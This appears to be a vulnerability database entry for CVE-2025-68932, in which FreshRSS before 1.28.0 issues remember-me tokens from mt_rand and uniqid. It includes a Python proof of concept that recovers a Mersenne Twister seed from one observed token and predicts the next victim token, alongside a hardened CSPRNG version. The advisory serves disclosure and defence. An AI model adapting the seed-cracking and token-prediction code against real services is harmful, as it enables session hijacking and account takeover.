CVE-2025-68932

CRITICAL

FreshRSS < 1.28.0 - Account Takeover via Weak PRNG Session Tokens

Title source: llm

Description

FreshRSS is a free, self-hostable RSS aggregator. Prior to version 1.28.0, FreshRSS generates its remember-me authentication tokens and challenge-response nonces with cryptographically weak random number generators: mt_rand(), a Mersenne Twister whose entire output stream is determined by a 32-bit seed and is therefore brute-forceable, and uniqid(), which is built from the current time in seconds and microseconds. An attacker who recovers the generator state can compute valid tokens, leading to account takeover through persistent session hijacking. The remember-me tokens provide permanent authentication and are the sole credential for the "keep me logged in" functionality. This issue has been patched in version 1.28.0.
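The following is an added illustration of the weakness class described above; it is not FreshRSS code and does not reproduce the project's real token format. It reimplements PHP's (>= 7.1) mt_srand()/mt_rand() in its no-argument form (MT19937 output shifted right by one bit) so the numbers match what PHP produces, builds a constructed "remember-me" token from four consecutive mt_rand() values, recovers the seed from a single observed token by brute force, and predicts the token the server will issue next. The secret seed (1337), the 5000-seed search range and the token layout are demo assumptions; a real PHP seed is 32 bits, which is hours in pure Python but minutes in a compiled seed cracker. The hardened half uses Python's secrets and hmac modules as stand-ins for PHP's random_bytes() and hash_equals().

```python
"""Added illustration for CVE-2025-68932 (not FreshRSS code).

Models PHP >= 7.1 mt_srand()/mt_rand() (no-argument form: MT19937 output >> 1),
shows that a token built from mt_rand() output is fully determined by the 32-bit
seed, recovers the seed from one observed token, predicts the next token, and
contrasts it with a CSPRNG-based token. Token layout, secret seed and seed range
are constructed for the demo; FreshRSS's real token format is not reproduced.
"""
import hmac
import secrets

MT_N, MT_M = 624, 397


class PhpMtRand:
    """MT19937 with the reference init_genrand seeding, as PHP >= 7.1 uses."""

    def __init__(self, seed: int) -> None:
        self.mt = [0] * MT_N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, MT_N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = MT_N  # state is regenerated on the first draw

    def _twist(self) -> None:
        mt = self.mt
        for i in range(MT_N):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % MT_N] & 0x7FFFFFFF)
            mt[i] = mt[(i + MT_M) % MT_N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def raw32(self) -> int:
        """One tempered 32-bit MT19937 output."""
        if self.index >= MT_N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

    def mt_rand(self) -> int:
        """PHP's mt_rand() with no arguments returns the 32-bit output >> 1."""
        return self.raw32() >> 1


def weak_token(prng: PhpMtRand, words: int = 4) -> str:
    """Constructed 'remember-me' token: hex of four consecutive mt_rand() values."""
    return "".join(f"{prng.mt_rand():08x}" for _ in range(words))


def recover_seed(observed: str, candidates: range, words: int = 4):
    """Brute-force the seed whose first token equals the one the attacker observed.

    Real PHP seeds are 32 bits; 2^32 candidates takes hours in Python but only
    minutes in a compiled cracker. The range is kept tiny so the demo runs fast.
    """
    for seed in candidates:
        if weak_token(PhpMtRand(seed), words) == observed:
            return seed
    return None


def predict_next_token(seed: int, tokens_already_issued: int, words: int = 4) -> str:
    """Replay the server's PRNG stream and read off the token it will issue next."""
    replica = PhpMtRand(seed)
    for _ in range(tokens_already_issued):
        weak_token(replica, words)
    return weak_token(replica, words)


def attack_demo(secret_seed: int = 1337, search: range = range(0, 5000)) -> dict:
    """Server issues one token the attacker can see, then one for the victim."""
    server = PhpMtRand(secret_seed)
    leaked = weak_token(server)        # e.g. the token set on the attacker's own login
    victim_token = weak_token(server)  # the next token the server hands out
    seed = recover_seed(leaked, search)
    predicted = predict_next_token(seed, tokens_already_issued=1) if seed is not None else None
    return {"seed": seed, "predicted": predicted, "victim": victim_token,
            "hijacked": predicted == victim_token}


def strong_token(nbytes: int = 32) -> str:
    """Hardened form: OS CSPRNG (PHP equivalent: bin2hex(random_bytes(32)))."""
    return secrets.token_hex(nbytes)


def token_matches(stored: str, presented: str) -> bool:
    """Constant-time comparison (PHP equivalent: hash_equals())."""
    return hmac.compare_digest(stored, presented)


if __name__ == "__main__":
    print(attack_demo())
```

Running the script prints the recovered seed and the predicted token alongside the one the server actually issued. Two sanity anchors tie the model to real PHP: seed 5489 yields the MT19937 reference first output 3499211612, and mt_srand(1); mt_rand() yields 895547922 on PHP >= 7.1. The point for a reviewer is that no amount of hashing or hex-encoding a mt_rand() or uniqid() value adds entropy; a bearer token that grants permanent login must come from a CSPRNG (random_bytes() in PHP) and be compared in constant time.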

Scores

CVSS v3 9.8
EPSS 0.0050
EPSS Percentile 38.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-338
Status published
Products (1)
freshrss/freshrss < 1.28.0
Published Dec 27, 2025
Tracked Since Feb 18, 2026